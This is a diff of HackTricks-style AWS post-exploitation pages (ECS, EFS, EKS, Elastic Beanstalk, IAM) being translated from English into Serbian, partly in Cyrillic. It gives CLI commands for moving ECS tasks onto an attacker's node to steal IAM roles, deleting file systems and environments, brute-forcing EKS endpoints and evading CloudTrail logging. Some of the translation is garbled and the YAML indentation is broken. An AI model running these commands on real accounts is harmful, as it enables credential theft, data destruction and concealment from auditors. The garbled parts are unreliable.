-Furthermore, the **EC2 instance role** will usually have enough **permissions** to **update the container instance state** of the EC2 instances being used as nodes inside the cluster. An attacker could modify the **state of an instance to DRAINING**, then ECS will **remove all the tasks from it** and the ones being run as **REPLICA** will be **run in a different instance,** potentially inside the **attackers instance** so he can **steal their IAM roles** and potential sensitive info from inside the container.
-
+Pored toga, **EC2 instanca uloga** obično će imati dovoljno **dozvola** da **ažurira stanje kontejner instance** EC2 instanci koje se koriste kao čvorovi unutar klastera. Napadač bi mogao da izmeni **stanje instance na DRAINING**, tada će ECS **ukloniti sve zadatke sa nje** i oni koji se izvršavaju kao **REPLICA** će biti **pokrenuti na drugoj instanci,** potencijalno unutar **napadačeve instance** tako da može **ukrasti njihove IAM uloge** i potencijalno osetljive informacije iz kontejnera.
 ```bash
 aws ecs update-container-instances-state \
-    --cluster  --status DRAINING --container-instances 
+--cluster  --status DRAINING --container-instances 
 ```
-
-The same technique can be done by **deregistering the EC2 instance from the cluster**. This is potentially less stealthy but it will **force the tasks to be run in other instances:**
-
+Ista tehnika se može primeniti **odjavljivanjem EC2 instance iz klastera**. Ovo je potencijalno manje prikriveno, ali će **prisiliti zadatke da se izvršavaju na drugim instancama:**
 ```bash
 aws ecs deregister-container-instance \
-    --cluster  --container-instance  --force
+--cluster  --container-instance  --force
 ```
-
-A final technique to force the re-execution of tasks is by indicating ECS that the **task or container was stopped**. There are 3 potential APIs to do this:
-
+Zadnja tehnika za prisiljavanje ponovnog izvršavanja zadataka je da se ECS-u naznači da je **zadatak ili kontejner zaustavljen**. Postoje 3 potencijalne API-ja za to:
 ```bash
 # Needs: ecs:SubmitTaskStateChange
 aws ecs submit-task-state-change --cluster  \
-    --status STOPPED --reason "anything" --containers [...]
+--status STOPPED --reason "anything" --containers [...]
 
 # Needs: ecs:SubmitContainerStateChange
 aws ecs submit-container-state-change ...
@@ -55,13 +50,8 @@ aws ecs submit-container-state-change ...
 # Needs: ecs:SubmitAttachmentStateChanges
 aws ecs submit-attachment-state-changes ...
 ```
+### Uk stealing osetljivih informacija iz ECR kontejnera
 
-### Steal sensitive info from ECR containers
-
-The EC2 instance will probably also have the permission `ecr:GetAuthorizationToken` allowing it to **download images** (you could search for sensitive info in them).
+EC2 instanca će verovatno imati dozvolu `ecr:GetAuthorizationToken` koja joj omogućava da **preuzme slike** (možete tražiti osetljive informacije u njima).
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md
index 35b644689..67da665fe 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## EFS
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-efs-enum.md
@@ -12,47 +12,35 @@ For more information check:
 
 ### `elasticfilesystem:DeleteMountTarget`
 
-An attacker could delete a mount target, potentially disrupting access to the EFS file system for applications and users relying on that mount target.
-
+Napadač bi mogao da obriše mount target, potencijalno ometajući pristup EFS fajl sistemu za aplikacije i korisnike koji se oslanjaju na taj mount target.
 ```sql
 aws efs delete-mount-target --mount-target-id 
 ```
-
-**Potential Impact**: Disruption of file system access and potential data loss for users or applications.
+**Potencijalni uticaj**: Poremećaj pristupa sistemu datoteka i potencijalni gubitak podataka za korisnike ili aplikacije.
 
 ### `elasticfilesystem:DeleteFileSystem`
 
-An attacker could delete an entire EFS file system, which could lead to data loss and impact applications relying on the file system.
-
+Napadač bi mogao da obriše čitav EFS sistem datoteka, što bi moglo dovesti do gubitka podataka i uticati na aplikacije koje se oslanjaju na sistem datoteka.
 ```perl
 aws efs delete-file-system --file-system-id 
 ```
-
-**Potential Impact**: Data loss and service disruption for applications using the deleted file system.
+**Potencijalni uticaj**: Gubitak podataka i prekid usluge za aplikacije koje koriste obrisani fajl sistem.
 
 ### `elasticfilesystem:UpdateFileSystem`
 
-An attacker could update the EFS file system properties, such as throughput mode, to impact its performance or cause resource exhaustion.
-
+Napadač bi mogao da ažurira svojstva EFS fajl sistema, kao što su način propusnosti, kako bi uticao na njegovu performansu ili izazvao iscrpljivanje resursa.
 ```sql
 aws efs update-file-system --file-system-id  --provisioned-throughput-in-mibps 
 ```
+**Potencijalni uticaj**: Degradacija performansi fajl sistema ili iscrpljivanje resursa.
 
-**Potential Impact**: Degradation of file system performance or resource exhaustion.
-
-### `elasticfilesystem:CreateAccessPoint` and `elasticfilesystem:DeleteAccessPoint`
-
-An attacker could create or delete access points, altering access control and potentially granting themselves unauthorized access to the file system.
+### `elasticfilesystem:CreateAccessPoint` i `elasticfilesystem:DeleteAccessPoint`
 
+Napadač bi mogao da kreira ili obriše pristupne tačke, menjajući kontrolu pristupa i potencijalno sebi dodeljujući neovlašćen pristup fajl sistemu.
 ```arduino
 aws efs create-access-point --file-system-id  --posix-user  --root-directory 
 aws efs delete-access-point --access-point-id 
 ```
-
-**Potential Impact**: Unauthorized access to the file system, data exposure or modification.
+**Potencijalni uticaj**: Neovlašćen pristup fajl sistemu, izlaganje ili modifikacija podataka.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md
index eb1f77f46..6ceac5d10 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## EKS
 
-For mor information check
+Za više informacija proverite
 
 {{#ref}}
 ../aws-services/aws-eks-enum.md
@@ -12,102 +12,93 @@ For mor information check
 
 ### Enumerate the cluster from the AWS Console
 
-If you have the permission **`eks:AccessKubernetesApi`** you can **view Kubernetes objects** via AWS EKS console ([Learn more](https://docs.aws.amazon.com/eks/latest/userguide/view-workloads.html)).
+Ako imate dozvolu **`eks:AccessKubernetesApi`** možete **videti Kubernetes objekte** putem AWS EKS konzole ([Saznajte više](https://docs.aws.amazon.com/eks/latest/userguide/view-workloads.html)).
 
 ### Connect to AWS Kubernetes Cluster
 
-- Easy way:
-
+- Lako rešenje:
 ```bash
 # Generate kubeconfig
 aws eks update-kubeconfig --name aws-eks-dev
 ```
+- Nije tako lak način:
 
-- Not that easy way:
-
-If you can **get a token** with **`aws eks get-token --name `** but you don't have permissions to get cluster info (describeCluster), you could **prepare your own `~/.kube/config`**. However, having the token, you still need the **url endpoint to connect to** (if you managed to get a JWT token from a pod read [here](aws-eks-post-exploitation.md#get-api-server-endpoint-from-a-jwt-token)) and the **name of the cluster**.
-
-In my case, I didn't find the info in CloudWatch logs, but I **found it in LaunchTemaplates userData** and in **EC2 machines in userData also**. You can see this info in **userData** easily, for example in the next example (the cluster name was cluster-name):
+Ako možete **dobiti token** sa **`aws eks get-token --name `** ali nemate dozvole za dobijanje informacija o klasteru (describeCluster), mogli biste **pripremiti svoj `~/.kube/config`**. Međutim, imajući token, još uvek vam je potreban **url endpoint za povezivanje** (ako ste uspeli da dobijete JWT token iz poda pročitajte [ovde](aws-eks-post-exploitation.md#get-api-server-endpoint-from-a-jwt-token)) i **ime klastera**.
 
+U mom slučaju, nisam našao informacije u CloudWatch logovima, ali sam **pronašao u LaunchTemplates userData** i u **EC2 mašinama u userData takođe**. Ove informacije možete lako videti u **userData**, na primer u sledećem primeru (ime klastera je bilo cluster-name):
 ```bash
 API_SERVER_URL=https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-east-1.eks.amazonaws.com
 
 /etc/eks/bootstrap.sh cluster-name --kubelet-extra-args '--node-labels=eks.amazonaws.com/sourceLaunchTemplateVersion=1,alpha.eksctl.io/cluster-name=cluster-name,alpha.eksctl.io/nodegroup-name=prd-ondemand-us-west-2b,role=worker,eks.amazonaws.com/nodegroup-image=ami-002539dd2c532d0a5,eks.amazonaws.com/capacityType=ON_DEMAND,eks.amazonaws.com/nodegroup=prd-ondemand-us-west-2b,type=ondemand,eks.amazonaws.com/sourceLaunchTemplateId=lt-0f0f0ba62bef782e5 --max-pods=58' --b64-cluster-ca $B64_CLUSTER_CA --apiserver-endpoint $API_SERVER_URL --dns-cluster-ip $K8S_CLUSTER_DNS_IP --use-max-pods false
 ```
-
 

 
-kube config
-
+kube konfiguracija
 ```yaml
 describe-cache-parametersapiVersion: v1
 clusters:
-  - cluster:
-      certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUMvakNDQWVhZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeU1USXlPREUyTWpjek1Wb1hEVE15TVRJeU5URTJNamN6TVZvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTDlXCk9OS0ZqeXZoRUxDZGhMNnFwWkMwa1d0UURSRVF1UzVpRDcwK2pjbjFKWXZ4a3FsV1ZpbmtwOUt5N2x2ME5mUW8KYkNqREFLQWZmMEtlNlFUWVVvOC9jQXJ4K0RzWVlKV3dzcEZGbWlsY1lFWFZHMG5RV1VoMVQ3VWhOanc0MllMRQpkcVpzTGg4OTlzTXRLT1JtVE5sN1V6a05pTlUzSytueTZSRysvVzZmbFNYYnRiT2kwcXJSeFVpcDhMdWl4WGRVCnk4QTg3VjRjbllsMXo2MUt3NllIV3hhSm11eWI5enRtbCtBRHQ5RVhOUXhDMExrdWcxSDBqdTl1MDlkU09YYlkKMHJxY2lINjYvSTh0MjlPZ3JwNkY0dit5eUNJUjZFQURRaktHTFVEWUlVSkZ4WXA0Y1pGcVA1aVJteGJ5Nkh3UwpDSE52TWNJZFZRRUNQMlg5R2c4Q0F3RUFBYU5aTUZjd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZQVXFsekhWZmlDd0xqalhPRmJJUUc3L0VxZ1hNQlVHQTFVZEVRUU8KTUF5Q0NtdDFZbVZ5Ym1WMFpYTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBS1o4c0l4aXpsemx0aXRPcGcySgpYV0VUSThoeWxYNWx6cW1mV0dpZkdFVVduUDU3UEVtWW55eWJHbnZ5RlVDbnczTldMRTNrbEVMQVE4d0tLSG8rCnBZdXAzQlNYamdiWFovdWVJc2RhWlNucmVqNU1USlJ3SVFod250ZUtpU0J4MWFRVU01ZGdZc2c4SlpJY3I2WC8KRG5POGlHOGxmMXVxend1dUdHSHM2R1lNR0Mvd1V0czVvcm1GS291SmtSUWhBZElMVkNuaStYNCtmcHUzT21UNwprS3VmR0tyRVlKT09VL1c2YTB3OTRycU9iSS9Mem1GSWxJQnVNcXZWVDBwOGtlcTc1eklpdGNzaUJmYVVidng3Ci9sMGhvS1RqM0IrOGlwbktIWW4wNGZ1R2F2YVJRbEhWcldDVlZ4c3ZyYWpxOUdJNWJUUlJ6TnpTbzFlcTVZNisKRzVBPQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg==
-      server: https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com
-    name: arn:aws:eks:us-east-1::cluster/
+- cluster:
+certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUMvakNDQWVhZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeU1USXlPREUyTWpjek1Wb1hEVE15TVRJeU5URTJNamN6TVZvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTDlXCk9OS0ZqeXZoRUxDZGhMNnFwWkMwa1d0UURSRVF1UzVpRDcwK2pjbjFKWXZ4a3FsV1ZpbmtwOUt5N2x2ME5mUW8KYkNqREFLQWZmMEtlNlFUWVVvOC9jQXJ4K0RzWVlKV3dzcEZGbWlsY1lFWFZHMG5RV1VoMVQ3VWhOanc0MllMRQpkcVpzTGg4OTlzTXRLT1JtVE5sN1V6a05pTlUzSytueTZSRysvVzZmbFNYYnRiT2kwcXJSeFVpcDhMdWl4WGRVCnk4QTg3VjRjbllsMXo2MUt3NllIV3hhSm11eWI5enRtbCtBRHQ5RVhOUXhDMExrdWcxSDBqdTl1MDlkU09YYlkKMHJxY2lINjYvSTh0MjlPZ3JwNkY0dit5eUNJUjZFQURRaktHTFVEWUlVSkZ4WXA0Y1pGcVA1aVJteGJ5Nkh3UwpDSE52TWNJZFZRRUNQMlg5R2c4Q0F3RUFBYU5aTUZjd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZQVXFsekhWZmlDd0xqalhPRmJJUUc3L0VxZ1hNQlVHQTFVZEVRUU8KTUF5Q0NtdDFZbVZ5Ym1WMFpYTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBS1o4c0l4aXpsemx0aXRPcGcySgpYV0VUSThoeWxYNWx6cW1mV0dpZkdFVVduUDU3UEVtWW55eWJHbnZ5RlVDbnczTldMRTNrbEVMQVE4d0tLSG8rCnBZdXAzQlNYamdiWFovdWVJc2RhWlNucmVqNU1USlJ3SVFod250ZUtpU0J4MWFRVU01ZGdZc2c4SlpJY3I2WC8KRG5POGlHOGxmMXVxend1dUdHSHM2R1lNR0Mvd1V0czVvcm1GS291SmtSUWhBZElMVkNuaStYNCtmcHUzT21UNwprS3VmR0tyRVlKT09VL1c2YTB3OTRycU9iSS9Mem1GSWxJQnVNcXZWVDBwOGtlcTc1eklpdGNzaUJmYVVidng3Ci9sMGhvS1RqM0IrOGlwbktIWW4wNGZ1R2F2YVJRbEhWcldDVlZ4c3ZyYWpxOUdJNWJUUlJ6TnpTbzFlcTVZNisKRzVBPQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg==
+server: https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com
+name: arn:aws:eks:us-east-1::cluster/
 contexts:
-  - context:
-      cluster: arn:aws:eks:us-east-1::cluster/
-      user: arn:aws:eks:us-east-1::cluster/
-    name: arn:aws:eks:us-east-1::cluster/
+- context:
+cluster: arn:aws:eks:us-east-1::cluster/
+user: arn:aws:eks:us-east-1::cluster/
+name: arn:aws:eks:us-east-1::cluster/
 current-context: arn:aws:eks:us-east-1::cluster/
 kind: Config
 preferences: {}
 users:
-  - name: arn:aws:eks:us-east-1::cluster/
-    user:
-      exec:
-        apiVersion: client.authentication.k8s.io/v1beta1
-        args:
-          - --region
-          - us-west-2
-          - --profile
-          - 
-          - eks
-          - get-token
-          - --cluster-name
-          - 
-        command: aws
-        env: null
-        interactiveMode: IfAvailable
-        provideClusterInfo: false
+- name: arn:aws:eks:us-east-1::cluster/
+user:
+exec:
+apiVersion: client.authentication.k8s.io/v1beta1
+args:
+- --region
+- us-west-2
+- --profile
+- 
+- eks
+- get-token
+- --cluster-name
+- 
+command: aws
+env: null
+interactiveMode: IfAvailable
+provideClusterInfo: false
 ```
-
 

 
-### From AWS to Kubernetes
+### Od AWS do Kubernetes
 
-The **creator** of the **EKS cluster** is **ALWAYS** going to be able to get into the kubernetes cluster part of the group **`system:masters`** (k8s admin). At the time of this writing there is **no direct way** to find **who created** the cluster (you can check CloudTrail). And the is **no way** to **remove** that **privilege**.
+**Kreator** **EKS klastera** će **UVEK** moći da uđe u deo kubernetes klastera grupe **`system:masters`** (k8s admin). U trenutku pisanja ovog teksta **ne postoji direktan način** da se sazna **ko je kreirao** klaster (možete proveriti CloudTrail). I **ne postoji način** da se **ukloni** ta **privilegija**.
 
-The way to grant **access to over K8s to more AWS IAM users or roles** is using the **configmap** **`aws-auth`**.
+Način da se dodeli **pristup više AWS IAM korisnicima ili rolama** je korišćenjem **configmap** **`aws-auth`**.
 
 > [!WARNING]
-> Therefore, anyone with **write access** over the config map **`aws-auth`** will be able to **compromise the whole cluster**.
+> Stoga, svako ko ima **pristup za pisanje** na config mapu **`aws-auth`** će moći da **kompromituje ceo klaster**.
 
-For more information about how to **grant extra privileges to IAM roles & users** in the **same or different account** and how to **abuse** this to [**privesc check this page**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#aws-eks-aws-auth-configmaps).
+Za više informacija o tome kako da **dodelite dodatne privilegije IAM rolama i korisnicima** u **isto ili različitoj računu** i kako da **zloupotrebite** ovo da [**privesc proverite ovu stranicu**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#aws-eks-aws-auth-configmaps).
 
-Check also[ **this awesome**](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator) **post to learn how the authentication IAM -> Kubernetes work**.
+Proverite takođe[ **ovaj sjajan**](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator) **post da saznate kako funkcioniše autentifikacija IAM -> Kubernetes**.
 
-### From Kubernetes to AWS
+### Od Kubernetes do AWS
 
-It's possible to allow an **OpenID authentication for kubernetes service account** to allow them to assume roles in AWS. Learn how [**this work in this page**](../../kubernetes-security/kubernetes-pivoting-to-clouds.md#workflow-of-iam-role-for-service-accounts-1).
+Moguće je omogućiti **OpenID autentifikaciju za kubernetes servisni nalog** da im omogući da preuzmu uloge u AWS-u. Saznajte kako [**to funkcioniše na ovoj stranici**](../../kubernetes-security/kubernetes-pivoting-to-clouds.md#workflow-of-iam-role-for-service-accounts-1).
 
-### GET Api Server Endpoint from a JWT Token
-
-Decoding the JWT token we get the cluster id & also the region. ![image](https://github.com/HackTricks-wiki/hacktricks-cloud/assets/87022719/0e47204a-eea5-4fcb-b702-36dc184a39e9) Knowing that the standard format for EKS url is
+### GET Api Server Endpoint iz JWT Tokena
 
+Dekodiranjem JWT tokena dobijamo id klastera i takođe region. ![image](https://github.com/HackTricks-wiki/hacktricks-cloud/assets/87022719/0e47204a-eea5-4fcb-b702-36dc184a39e9) Znajući da je standardni format za EKS url
 ```bash
 https://...eks.amazonaws.com
 ```
-
-Didn't find any documentation that explain the criteria for the 'two chars' and the 'number'. But making some test on my behalf I see recurring these one:
+Nisam pronašao nikakvu dokumentaciju koja objašnjava kriterijume za 'dva karaktera' i 'broj'. Ali, radeći neke testove u svoje ime, primetio sam da se ovi ponavljaju:
 
 - gr7
 - yl4
 
-Anyway are just 3 chars we can bruteforce them. Use the below script for generating the list
-
+U svakom slučaju, to su samo 3 karaktera koje možemo bruteforce-ovati. Koristite ispod navedeni skript za generisanje liste.
 ```python
 from itertools import product
 from string import ascii_lowercase
@@ -116,44 +107,37 @@ letter_combinations = product('abcdefghijklmnopqrstuvwxyz', repeat = 2)
 number_combinations = product('0123456789', repeat = 1)
 
 result = [
-	f'{''.join(comb[0])}{comb[1][0]}'
-	for comb in product(letter_combinations, number_combinations)
+f'{''.join(comb[0])}{comb[1][0]}'
+for comb in product(letter_combinations, number_combinations)
 ]
 
 with open('out.txt', 'w') as f:
-	f.write('\n'.join(result))
+f.write('\n'.join(result))
 ```
-
-Then with wfuzz
-
+Тада са wfuzz
 ```bash
 wfuzz -Z -z file,out.txt --hw 0 https://.FUZZ..eks.amazonaws.com
 ```
-
 > [!WARNING]
-> Remember to replace & .
+> Запамтите да замените & .
 
-### Bypass CloudTrail
+### Заобилажење CloudTrail
 
-If an attacker obtains credentials of an AWS with **permission over an EKS**. If the attacker configures it's own **`kubeconfig`** (without calling **`update-kubeconfig`**) as explained previously, the **`get-token`** doesn't generate logs in Cloudtrail because it doesn't interact with the AWS API (it just creates the token locally).
+Ако нападач добије акредитиве AWS са **дозволом над EKS**. Ако нападач конфигурише свој **`kubeconfig`** (без позивања **`update-kubeconfig`**) као што је објашњено раније, **`get-token`** не генерише логове у Cloudtrail-у јер не интерактује са AWS API-jem (само локално креира токен).
 
-So when the attacker talks with the EKS cluster, **cloudtrail won't log anything related to the user being stolen and accessing it**.
+Дакле, када нападач комуницира са EKS кластером, **cloudtrail неће логовати ништа у вези са украденим корисником и његовим приступом**.
 
-Note that the **EKS cluster might have logs enabled** that will log this access (although, by default, they are disabled).
+Напомена да **EKS кластер може имати укључене логове** који ће логовати овај приступ (иако су по подразумеваној поставци онемогућени).
 
-### EKS Ransom?
+### EKS Откуп?
 
-By default the **user or role that created** a cluster is **ALWAYS going to have admin privileges** over the cluster. And that the only "secure" access AWS will have over the Kubernetes cluster.
+По подразумеваној поставци, **корисник или улога која је креирала** кластер **УВЕК ће имати администраторске привилегије** над кластером. И да је то једини "сигуран" приступ који AWS може имати над Kubernetes кластером.
 
-So, if an **attacker compromises a cluster using fargate** and **removes all the other admins** and d**eletes the AWS user/role that created** the Cluster, ~~the attacker could have **ransomed the cluste**~~**r**.
+Дакле, ако **нападач компромитује кластер користећи fargate** и **уклони све остале администраторе** и **обрише AWS корисника/улогу која је креирала** кластер, ~~нападач би могао да **откупи кластер**~~**.
 
 > [!TIP]
-> Note that if the cluster was using **EC2 VMs**, it could be possible to get Admin privileges from the **Node** and recover the cluster.
+> Напомена да ако је кластер користио **EC2 ВМ**, могло би бити могуће добити администраторске привилегије из **Node** и опоравити кластер.
 >
-> Actually, If the cluster is using Fargate you could EC2 nodes or move everything to EC2 to the cluster and recover it accessing the tokens in the node.
+> У ствари, ако кластер користи Fargate, могли бисте EC2 чворове или преместити све на EC2 у кластер и опоравити га приступајући токенима у чвору.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md
index 6267ee02f..7a34a0f37 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## Elastic Beanstalk
 
-For more information:
+Za više informacija:
 
 {{#ref}}
 ../aws-services/aws-elastic-beanstalk-enum.md
@@ -13,72 +13,58 @@ For more information:
 ### `elasticbeanstalk:DeleteApplicationVersion`
 
 > [!NOTE]
-> TODO: Test if more permissions are required for this
-
-An attacker with the permission `elasticbeanstalk:DeleteApplicationVersion` can **delete an existing application version**. This action could disrupt application deployment pipelines or cause loss of specific application versions if not backed up.
+> TODO: Testirati da li su potrebne dodatne dozvole za ovo
 
+Napadač sa dozvolom `elasticbeanstalk:DeleteApplicationVersion` može **izbrisati postojeću verziju aplikacije**. Ova akcija može ometati procese implementacije aplikacija ili uzrokovati gubitak specifičnih verzija aplikacija ako nisu sačuvane.
 ```bash
 aws elasticbeanstalk delete-application-version --application-name my-app --version-label my-version
 ```
-
-**Potential Impact**: Disruption of application deployment and potential loss of application versions.
+**Potencijalni Uticaj**: Poremećaj u implementaciji aplikacija i potencijalni gubitak verzija aplikacija.
 
 ### `elasticbeanstalk:TerminateEnvironment`
 
-> [!NOTE]
-> TODO: Test if more permissions are required for this
-
-An attacker with the permission `elasticbeanstalk:TerminateEnvironment` can **terminate an existing Elastic Beanstalk environment**, causing downtime for the application and potential data loss if the environment is not configured for backups.
+> [!NAPOMENA]
+> TODO: Testirati da li su potrebne dodatne dozvole za ovo
 
+Napadač sa dozvolom `elasticbeanstalk:TerminateEnvironment` može **ukinuti postojeće Elastic Beanstalk okruženje**, uzrokujući prekid rada aplikacije i potencijalni gubitak podataka ako okruženje nije konfigurisano za rezervne kopije.
 ```bash
 aws elasticbeanstalk terminate-environment --environment-name my-existing-env
 ```
-
-**Potential Impact**: Downtime of the application, potential data loss, and disruption of services.
+**Potencijalni uticaj**: Vreme neaktivnosti aplikacije, potencijalni gubitak podataka i prekid usluga.
 
 ### `elasticbeanstalk:DeleteApplication`
 
 > [!NOTE]
-> TODO: Test if more permissions are required for this
-
-An attacker with the permission `elasticbeanstalk:DeleteApplication` can **delete an entire Elastic Beanstalk application**, including all its versions and environments. This action could cause a significant loss of application resources and configurations if not backed up.
+> TODO: Testirati da li su potrebne dodatne dozvole za ovo
 
+Napadač sa dozvolom `elasticbeanstalk:DeleteApplication` može **izbrisati celu Elastic Beanstalk aplikaciju**, uključujući sve njene verzije i okruženja. Ova akcija može izazvati značajan gubitak resursa i konfiguracija aplikacije ako nisu sačuvani.
 ```bash
 aws elasticbeanstalk delete-application --application-name my-app --terminate-env-by-force
 ```
-
-**Potential Impact**: Loss of application resources, configurations, environments, and application versions, leading to service disruption and potential data loss.
+**Potencijalni uticaj**: Gubitak resursa aplikacije, konfiguracija, okruženja i verzija aplikacije, što može dovesti do prekida usluge i potencijalnog gubitka podataka.
 
 ### `elasticbeanstalk:SwapEnvironmentCNAMEs`
 
 > [!NOTE]
-> TODO: Test if more permissions are required for this
-
-An attacker with the `elasticbeanstalk:SwapEnvironmentCNAMEs` permission can **swap the CNAME records of two Elastic Beanstalk environments**, which might cause the wrong version of the application to be served to users or lead to unintended behavior.
+> TODO: Testirati da li su potrebne dodatne dozvole za ovo
 
+Napadač sa `elasticbeanstalk:SwapEnvironmentCNAMEs` dozvolom može **promeniti CNAME zapise dva Elastic Beanstalk okruženja**, što može uzrokovati da pogrešna verzija aplikacije bude dostupna korisnicima ili dovesti do nepredviđenog ponašanja.
 ```bash
 aws elasticbeanstalk swap-environment-cnames --source-environment-name my-env-1 --destination-environment-name my-env-2
 ```
-
-**Potential Impact**: Serving the wrong version of the application to users or causing unintended behavior in the application due to swapped environments.
+**Potencijalni uticaj**: Posluživanje pogrešne verzije aplikacije korisnicima ili izazivanje nepredviđenog ponašanja u aplikaciji zbog zamenjenih okruženja.
 
 ### `elasticbeanstalk:AddTags`, `elasticbeanstalk:RemoveTags`
 
-> [!NOTE]
-> TODO: Test if more permissions are required for this
-
-An attacker with the `elasticbeanstalk:AddTags` and `elasticbeanstalk:RemoveTags` permissions can **add or remove tags on Elastic Beanstalk resources**. This action could lead to incorrect resource allocation, billing, or resource management.
+> [!NAPOMENA]
+> TODO: Testirati da li su potrebne dodatne dozvole za ovo
 
+Napadač sa `elasticbeanstalk:AddTags` i `elasticbeanstalk:RemoveTags` dozvolama može **dodavati ili uklanjati oznake na Elastic Beanstalk resursima**. Ova akcija može dovesti do pogrešne alokacije resursa, naplate ili upravljanja resursima.
 ```bash
 aws elasticbeanstalk add-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tags Key=MaliciousTag,Value=1
 
 aws elasticbeanstalk remove-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tag-keys MaliciousTag
 ```
-
-**Potential Impact**: Incorrect resource allocation, billing, or resource management due to added or removed tags.
+**Potencijalni uticaj**: Neispravna alokacija resursa, naplata ili upravljanje resursima zbog dodatih ili uklonjenih oznaka.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md
index f734122e8..b029d61f4 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md
@@ -4,104 +4,90 @@
 
 ## IAM
 
-For more information about IAM access:
+Za više informacija o IAM pristupu:
 
 {{#ref}}
 ../aws-services/aws-iam-enum.md
 {{#endref}}
 
-## Confused Deputy Problem
+## Problem zbunjenog zamenika
 
-If you **allow an external account (A)** to access a **role** in your account, you will probably have **0 visibility** on **who can exactly access that external account**. This is a problem, because if another external account (B) can access the external account (A) it's possible that **B will also be able to access your account**.
+Ako **dozvolite eksternom nalogu (A)** da pristupi **rolu** u vašem nalogu, verovatno ćete imati **0 vidljivosti** o **tome ko tačno može pristupiti tom eksternom nalogu**. To je problem, jer ako drugi eksterni nalog (B) može pristupiti eksternom nalogu (A), moguće je da **B takođe može pristupiti vašem nalogu**.
 
-Therefore, when allowing an external account to access a role in your account it's possible to specify an `ExternalId`. This is a "secret" string that the external account (A) **need to specify** in order to **assume the role in your organization**. As the **external account B won't know this string**, even if he has access over A he **won't be able to access your role**.
+Stoga, kada dozvoljavate eksternom nalogu da pristupi roli u vašem nalogu, moguće je odrediti `ExternalId`. Ovo je "tajna" string koja eksterni nalog (A) **mora da navede** kako bi **preuzeo ulogu u vašoj organizaciji**. Kako **eksterni nalog B neće znati ovu string**, čak i ako ima pristup A, **neće moći da pristupi vašoj roli**.
 
 

 
-However, note that this `ExternalId` "secret" is **not a secret**, anyone that can **read the IAM assume role policy will be able to see it**. But as long as the external account A knows it, but the external account **B doesn't know it**, it **prevents B abusing A to access your role**.
-
-Example:
+Međutim, imajte na umu da ova `ExternalId` "tajna" **nije tajna**, svako ko može **da pročita IAM politiku preuzimanja uloge moći će da je vidi**. Ali sve dok eksterni nalog A to zna, a eksterni nalog **B to ne zna**, to **sprečava B da zloupotrebi A kako bi pristupio vašoj roli**.
 
+Primer:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": {
-    "Effect": "Allow",
-    "Principal": {
